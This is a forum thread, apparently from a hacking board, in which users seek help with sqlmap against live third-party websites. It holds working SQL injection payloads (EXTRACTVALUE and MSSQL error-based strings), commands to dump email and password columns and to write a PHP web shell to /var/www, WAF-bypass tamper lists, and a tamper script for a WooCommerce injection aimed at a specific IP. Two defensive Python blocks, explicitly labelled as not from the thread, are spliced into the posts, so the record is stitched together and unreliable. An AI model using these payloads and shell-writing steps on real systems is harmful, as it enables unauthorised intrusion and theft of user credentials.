Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. dddg33

    dddg33 New Member

    Joined:
    28 Mar 2021
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    After
    Code:
    --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
    it returned:

    Code:
    [01:16:41] [CRITICAL] unable to retrieve the tables for any database
    [01:16:41] [WARNING] HTTP error codes detected during run:
    414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
    [01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    How can the WAF be bypassed?
    Thanks in advance!
     
  2. man474019

    man474019 New Member

    Joined:
    31 Jul 2015
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    I just can't dump table_names; I've tried --hex, --no-cast and tamper scripts

    Code:
    
    [05:46:09] [INFO] fetching tables for database: 'ar_new'
    [05:46:09] [INFO] fetching number of tables for database 'ar_new'
    you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
    [05:46:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [05:46:10] [INFO] retrieved:
    [05:46:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [05:46:11] [WARNING] unable to retrieve the number of tables for database 'ar_new'
    [05:46:11] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] N
    No tables found
    [05:46:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sayt.com'
    
    
     
  3. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    54
    Likes Received:
    5
    Reputations:
    0

    Is there a full manual from you somewhere?
     
  4. Juiseppe

    Juiseppe New Member

    Joined:
    16 Feb 2020
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Has anyone bypassed the Imunify360 (CloudLinux) WAF with sqlmap?
     
  5. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    230
    Likes Received:
    760
    Reputations:
    199
    Error on a negative limit
     
    #1125 Baskin-Robbins, 8 May 2021
    Last edited: 9 May 2021
    seostock likes this.
  6. matthhy

    matthhy New Member

    Joined:
    16 Feb 2017
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    Please advise: I scanned a site with Acunetix, it found an SQL vulnerability, but sqlmap can't get through it, I think because of a WAF. How do I figure out which tamper to use, or how do I pull the information sqlmap needs out of Acunetix?
     
  7. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    238
    Likes Received:
    435
    Reputations:
    131
    That's not quite how it works. First you have to work out the vulnerability yourself, and then automate the process with sqlmap. So, to understand which tamper to use, work it out by hand first.
     
    K800 and Svan like this.
  8. vladF

    vladF New Member

    Joined:
    5 Dec 2018
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    I'm trying to dump data and for almost an hour now I've been looking at this:
    [INFO] fetching entries of column(s) 'email,passwort' for table....
    Without any movement. Could it be that sqlmap takes a long time to count the number of rows if the database is large?
     
  9. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    184
    Likes Received:
    4
    Reputations:
    0
    SQLi on Magento
    /result/?q=1'
    Acunetix found the SQLi and even pulled out the DB name

    Code:
    Proof of Exploit
    SQL query - SELECT database()
    
    admin8sasdasd
    When sent through Burp
    site/result/?q=1'
    Response:

    Code:
    HTTP/1.1 503 Service Unavailable
    <pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br />
    <strong>Trace:</strong>
    <p>Error log record number:
    <address class="copyright">Magento is a trademark of Magento Inc. Copyright &copy; 2010 Magento Inc.</address>
    But when I try to exploit it with sqlmap, it doesn't see the SQLi :(
    Tried --text-only

    Is there maybe some tamper for Magento?
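The 503 page quoted above is the application echoing the raw MariaDB error to the client, which is an information disclosure in itself and the signal that makes error-based confirmation trivial. The block below is an added defensive example, not code from this thread, from Magento or from sqlmap: it scans HTTP response bodies for well-known DBMS error signatures so that a proxy log review, a staging crawl or a WAF egress rule catches such leaks before an attacker does. The signature list and both sample bodies (one modelled on the quoted page, one hardened) are constructed for illustration.

```python
"""Flag database error messages leaking into HTTP responses.

Added defensive example (not from the thread): run over captured responses
to find places where an application echoes raw DBMS errors to the client.
"""
import html
import re

# Error strings that identify the backend. Built from well-known
# driver/DBMS message formats; extend per stack. All constructed here.
SIGNATURES = {
    "MySQL/MariaDB": [
        r"You have an error in your SQL syntax",
        r"check the manual that corresponds to your (?:MySQL|MariaDB) server version",
        r"XPATH syntax error",
    ],
    "PDO (any DBMS)": [r"SQLSTATE\[[0-9A-Z]{5}\]"],
    "PostgreSQL": [r"ERROR:\s+syntax error at or near", r"\bpg_query\(\)", r"PG::SyntaxError"],
    "Microsoft SQL Server": [
        r"Unclosed quotation mark after the character string",
        r"Microsoft OLE DB Provider for SQL Server",
        r"Incorrect syntax near",
    ],
    "Oracle": [r"\bORA-\d{5}\b"],
    "SQLite": [r"SQLITE_ERROR", r'near "[^"]*": syntax error'],
}
COMPILED = {dbms: [re.compile(p) for p in pats] for dbms, pats in SIGNATURES.items()}


def find_db_error_leaks(body, context=60):
    """Return a list of (dbms, excerpt) for every signature found in body.

    HTML entities are decoded first so that '&quot;' and friends cannot hide
    a match inside an escaped error page."""
    text = html.unescape(body)
    hits = []
    for dbms, patterns in COMPILED.items():
        for pat in patterns:
            m = pat.search(text)
            if m:
                start = max(0, m.start() - context)
                end = min(len(text), m.end() + context)
                hits.append((dbms, text[start:end].strip()))
                break  # one excerpt per DBMS is enough for a report
    return hits


def classify_response(status, body):
    """Combine status code and body into a verdict a pipeline can act on."""
    leaks = find_db_error_leaks(body)
    if leaks:
        return "db-error-disclosure", leaks
    if status >= 500:
        return "server-error-no-leak", leaks
    return "clean", leaks


# Constructed sample bodies. The first mimics the verbose Magento page quoted
# in this thread; the second is what a hardened deployment should return.
LEAKY_503 = """HTTP/1.1 503 Service Unavailable
<pre>SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1<br />
<strong>Trace:</strong>"""
SAFE_503 = """HTTP/1.1 503 Service Unavailable
<h1>Service temporarily unavailable</h1><p>Reference: [PLACEHOLDER-REQUEST-ID]</p>"""

if __name__ == "__main__":
    for name, body in (("leaky", LEAKY_503), ("safe", SAFE_503)):
        verdict, leaks = classify_response(503, body)
        print(name, "->", verdict)
        for dbms, excerpt in leaks:
            print("   ", dbms, ":", excerpt[:80])
```

On the application side the fix is configuration, not a WAF rule: production deployments should render a generic error page carrying only an opaque reference id, while the exception text stays in the server log.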
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    Here you need to look by hand at what triggers the error and then tune a tamper for it by hand.
     
    joelblack likes this.
  11. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user
    Code:
    [INFO] retrieved: 'root@localhost'
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php

    >>Doesn't write the file, although the privileges are there

    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell

    select user()
    Code:
    [INFO] retrieved: 'root@localhost'
    select 'test' into outfile '/var/www/test.txt'
    Code:
    [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    
    What can I try? Or does INTO OUTFILE not execute in an error-based injection? load_file works
     
    #1131 Рамос, 11 Jul 2021
    Last edited: 11 Jul 2021
  12. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    230
    Likes Received:
    760
    Reputations:
    199
    A privilege like FILE != write permission on the directory
    +
    you didn't show the user's privileges; root@localhost is not necessarily the MySQL root user,
    but I think you know that.

    In principle it should work, since union, error and so on differ only in how the information is retrieved, i.e. one and the same query
    can be union and error and time-based and blind and stacked queries, though this doesn't apply to every query and DBMS.

    Though I don't quite understand why the first query worked but the second one errored, oh well.
    +

    In your case you could try writing the file to other directories, or look for another vector.
     
    #1132 Baskin-Robbins, 12 Jul 2021
    Last edited: 12 Jul 2021
    Рамос and seostock like this.
  13. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU
    Code:
    [23:12:06] [INFO] fetching current user
    [23:12:07] [INFO] retrieved: 'root@localhost'
    
    [*] 'root'@'localhost' (administrator) [28]:
        privilege: ALTER
        privilege: ALTER ROUTINE
        privilege: CREATE
        privilege: CREATE ROUTINE
        privilege: CREATE TABLESPACE
        privilege: CREATE TEMPORARY TABLES
        privilege: CREATE USER
        privilege: CREATE VIEW
        privilege: DELETE
        privilege: DROP
        privilege: EVENT
        privilege: EXECUTE
        privilege: FILE
        privilege: INDEX
        privilege: INSERT
        privilege: LOCK TABLES
        privilege: PROCESS
        privilege: REFERENCES
        privilege: RELOAD
        privilege: REPLICATION CLIENT
        privilege: REPLICATION SLAVE
        privilege: SELECT
        privilege: SHOW DATABASES
        privilege: SHOW VIEW
        privilege: SHUTDOWN
        privilege: SUPER
        privilege: TRIGGER
        privilege: UPDATE
    @@secure_file_priv
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
    [23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
    [23:18:45] [INFO] resumed: ' '
    select @@secure_file_priv: ' '
    --technique=E
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E
    
    [23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    --technique=B
    Code:
    sqlmap.py -r test.txt  --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B
    
    [23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
    The privileges are all fine; I just can't understand why INTO OUTFILE doesn't execute
     
    #1133 Рамос, 12 Jul 2021
    Last edited: 12 Jul 2021
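The privilege listing and the @@secure_file_priv value shown above are exactly what a defender should audit on an application database account. The following is an added example, not sqlmap's code and not from any poster in this thread: it parses privilege output in the layout sqlmap prints for --privileges, interprets secure_file_priv the way MySQL documents it, and rates the account's file-access exposure. The account name, privilege set and remediation text are constructed for illustration.

```python
"""Audit how much file access a MySQL/MariaDB account really has.

Added defensive example (not from the thread or from sqlmap): parses
privilege listings in the layout sqlmap prints for --privileges and
combines them with @@secure_file_priv to tell whether INTO OUTFILE /
LOAD_FILE() can touch the filesystem at all.
"""
import re

# Constructed sample in the layout sqlmap prints for --privileges
# (account name and privilege set are illustrative only).
SAMPLE_PRIVILEGES_OUTPUT = """\
[*] 'shopuser'@'localhost' (administrator) [5]:
    privilege: FILE
    privilege: SELECT
    privilege: INSERT
    privilege: UPDATE
    privilege: SUPER
"""

ACCOUNT_RE = re.compile(r"^\[\*\]\s+(\S+)")
PRIVILEGE_RE = re.compile(r"^\s*privilege:\s+(.+?)\s*$")

# Privileges a web application's DB account almost never needs.
DANGEROUS = {"FILE", "SUPER", "PROCESS", "SHUTDOWN", "RELOAD", "CREATE USER", "GRANT OPTION"}


def parse_privileges(text):
    """Return {account: set(privileges)} from sqlmap-style output."""
    result, current = {}, None
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line)
        if m:
            current = m.group(1)
            result[current] = set()
            continue
        m = PRIVILEGE_RE.match(line)
        if m and current is not None:
            result[current].add(m.group(1).upper())
    return result


def classify_secure_file_priv(value):
    """Interpret the server variable as MySQL documents it:
    NULL  -> file import/export disabled entirely
    ''    -> no path restriction (weakest setting; sqlmap shows it as ' ')
    path  -> limited to that directory"""
    if value is None:
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


def assess(account, privileges, secure_file_priv):
    """Return (risk, findings) for one account.

    FILE is only the server-side gate: even with FILE granted and an empty
    secure_file_priv, a write still needs the mysqld OS user to have
    permission on the target directory."""
    mode = classify_secure_file_priv(secure_file_priv)
    has_file = "FILE" in privileges
    findings = []
    if not has_file:
        risk = "low"
        findings.append(f"{account} lacks FILE; INTO OUTFILE and LOAD_FILE() are denied whatever secure_file_priv says")
    elif mode == "disabled":
        risk = "low"
        findings.append(f"{account} holds FILE but secure_file_priv is NULL, so the server refuses all file operations")
    elif mode == "restricted":
        risk = "medium"
        findings.append(f"{account} holds FILE; file operations are confined to {secure_file_priv!r}")
    else:
        risk = "high"
        findings.append(f"{account} holds FILE and secure_file_priv is empty: any path writable by the mysqld OS user is reachable")
    extra = sorted((DANGEROUS - {"FILE"}) & privileges)
    if extra:
        findings.append(f"{account} also holds administrative privileges an application does not need: {', '.join(extra)}")
    if has_file or extra:
        findings.append("Remediation: REVOKE the listed privileges from the application account and set secure_file_priv to a dedicated directory or NULL")
    return risk, findings


if __name__ == "__main__":
    for account, privs in parse_privileges(SAMPLE_PRIVILEGES_OUTPUT).items():
        for value in ("", "/var/lib/mysql-files/", None):
            risk, notes = assess(account, privs, value)
            print(f"secure_file_priv={value!r}: {risk}")
            for note in notes:
                print("   -", note)
```

The three runs in the main block walk the same account through the three secure_file_priv states, which is the quickest way to see that the server variable, not the GRANT list alone, decides whether file export is possible.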
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    230
    Likes Received:
    760
    Reputations:
    199
    well, for a start you should put a semicolon at the end of the last queries)) though maybe sqlmap doesn't need it,
    haven't used it in a long time.
    +
    https://github.com/sqlmapproject/sqlmap/issues/619
    In general the error is about stacked queries, and MySQL doesn't have such injections;
    I don't know, I'd turn verbose up to the maximum and try it by hand.
    Probably can't help with anything more.
     
    #1134 Baskin-Robbins, 13 Jul 2021
    Last edited: 13 Jul 2021
    Рамос and seostock like this.
  15. Рамос

    Рамос Member

    Joined:
    30 Oct 2009
    Messages:
    123
    Likes Received:
    7
    Reputations:
    1
    Then I'm powerless here. Either I need to move to another topic or give up)

    SELECT user();
    qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc
    Code:
    General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'

    SELECT 123 INTO OUTFILE '/tmp/test.txt';

    qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1
    qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr

    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1
    qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -
    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1
     
    #1135 Рамос, 13 Jul 2021
    Last edited: 14 Jul 2021
  16. birdborn

    birdborn New Member

    Joined:
    15 Jul 2021
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    IIS/dbms:mssql
    boolean-based blind/error-based
    1. with technique=B --is-dba=true, with technique=E --is-dba=false. Why?
    2. when listing tables (technique=E): [WARNING] the SQL query provided does not return any output (listing the databases works fine). common-tables helps, but since the site is custom-written it only finds 5 tables.
    How do I make sqlmap list the tables? :rolleyes:

    Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)
    Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (8607=8607
    Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
    ---
    [INFO] fetching tables for database: db1
    [PAYLOAD] -1789
    [PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118)+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects.name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(113)) AND (2349=2349
    [WARNING] the SQL query provided does not return any output
     
  17. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    424
    Likes Received:
    304
    Reputations:
    5
    With Cloud it's tough; there are no publicly available tampers for it. One option is to look for the real IP, which doesn't always work out
     
  18. xuanruou

    xuanruou New Member

    Joined:
    11 Apr 2012
    Messages:
    47
    Likes Received:
    1
    Reputations:
    0
    Greetings
    What can be done to bypass this?
    Code:
    http://45.56.90.204/demovul/demo.txt
    Code:
    /usr/bin/python2.7 sqlmap.py -u 'http://45.56.90.204/demovul/index.php/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=INJECTION&calculate_attribute_counts[][query_type]=and' --level 5 --risk 3 --tamper=tripleencode   -Ddemo_vul2 --tables

    [attachments: Screenshot 2021-07-22 214546.png, Screenshot 2021-07-20 170848.png, Screenshot 2021-07-22 220935.png]

    tripleencode.py
    Code:
    #!/usr/bin/env python
    
    """
    POC assistance for WooCommerce SQL Injection, Triple URL Encodes payload.
    
    Endpoint: /wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=INJECTION&calculate_attribute_counts[][query_type]=and
    
    Author: Zeroauth
    Social: https://twitter.com/zeroauth
    Site: https://zeroauth.ltd/blog
    """
    
    import string
    import urllib
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.LOWEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        retVal = payload + '#'
    
        retVal = urllib.quote(retVal)
        retVal = urllib.quote(retVal)
        retVal = urllib.quote(retVal)
    
        return retVal

    Thanks in advance!
     
    #1138 xuanruou, 22 Jul 2021
    Last edited: 22 Jul 2021